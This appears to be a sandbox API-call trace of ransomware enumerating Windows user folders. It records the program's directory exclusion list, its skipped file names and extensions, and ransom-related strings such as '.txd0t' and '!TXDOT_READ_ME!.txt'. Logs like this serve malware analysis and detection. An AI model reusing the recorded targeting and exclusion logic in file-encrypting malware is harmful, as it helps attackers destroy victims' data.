(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0077.211] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0077.211] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0077.211] GetProcessHeap () returned 0xe30000 [0077.211] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.211] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.211] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.211] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.211] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0077.211] StrCmpW (psz1="Documents", psz2=".") returned 1 [0077.211] StrCmpW (psz1="Documents", psz2="..") returned 1 [0077.211] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.211] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.211] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0077.211] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\boot\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="crypt_detect") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="cryptolocker") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="ransomware") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.212] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0077.212] GetProcessHeap () returned 0xe30000 [0077.212] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed41f8 [0077.212] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Documents", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0077.212] StrNCatW (in: psz1="C:\\Users\\Public\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0077.212] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0077.214] StrCmpW (psz1=".", psz2=".") returned 0 [0077.214] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.214] StrCmpW (psz1="..", psz2=".") returned 1 [0077.214] StrCmpW (psz1="..", psz2="..") returned 0 [0077.214] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.214] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.214] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.214] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0077.214] StrCmpW (psz1="My Music", psz2=".") returned 1 [0077.214] StrCmpW (psz1="My Music", psz2="..") returned 1 [0077.214] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0077.214] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0077.214] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0077.214] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0077.215] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0077.215] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0077.215] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0077.215] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0077.216] GetProcessHeap () returned 0xe30000 [0077.216] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.216] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0077.216] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0077.216] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0077.216] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.216] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.216] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0077.216] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="crypt_detect") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="cryptolocker") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="ransomware") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.217] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0077.217] GetProcessHeap () returned 0xe30000 [0077.217] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed41f8 [0077.217] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0077.217] StrNCatW (in: psz1="C:\\Users\\Public\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0077.217] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0077.217] StrCmpW (psz1=".", psz2=".") returned 0 [0077.217] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.217] StrCmpW (psz1="..", psz2=".") returned 1 [0077.217] StrCmpW (psz1="..", psz2="..") returned 0 [0077.217] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.217] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.217] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.217] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0077.218] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0077.218] GetProcessHeap () returned 0xe30000 [0077.218] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.218] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0077.218] StrCmpW (psz1="Libraries", psz2=".") returned 1 [0077.218] StrCmpW (psz1="Libraries", psz2="..") returned 1 [0077.218] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.218] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.218] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Libraries", cchMax=1056 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system32\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\local\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\boot\\") returned 0x0 [0077.218] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\perflogs\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\programdata\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\drivers\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\wsus\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="crypt_detect") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="cryptolocker") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="ransomware") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\WINDOWS") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.219] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files") returned 0x0 [0077.219] GetProcessHeap () returned 0xe30000 [0077.219] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed41f8 [0077.219] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0077.219] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0077.219] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25b0 [0077.219] StrCmpW (psz1=".", psz2=".") returned 0 [0077.219] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.219] StrCmpW (psz1="..", psz2=".") returned 1 [0077.220] StrCmpW (psz1="..", psz2="..") returned 0 [0077.220] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.220] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.220] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.220] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0077.220] StrCmpW (psz1="RecordedTV.library-ms", psz2=".") returned 1 [0077.220] StrCmpW (psz1="RecordedTV.library-ms", psz2="..") returned 1 [0077.220] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0077.220] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0077.220] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="RecordedTV.library-ms", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0077.220] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0077.220] StrCmpW (psz1=".library-ms", psz2=".txd0t") returned -1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="bootsect.bak") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="iconcache.db") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="thumbs.db") returned -1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2=" ransomware ") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2=" ransom ") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="debug.txt") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="boot.ini") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="desktop.ini") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="autorun.inf") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntuser.dat") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntldr") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntdetect.com") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="bootfont.bin") returned 1 [0077.220] StrCmpIW (psz1="RecordedTV.library-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.220] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0077.220] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".library-ms") returned 0x0 [0077.220] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 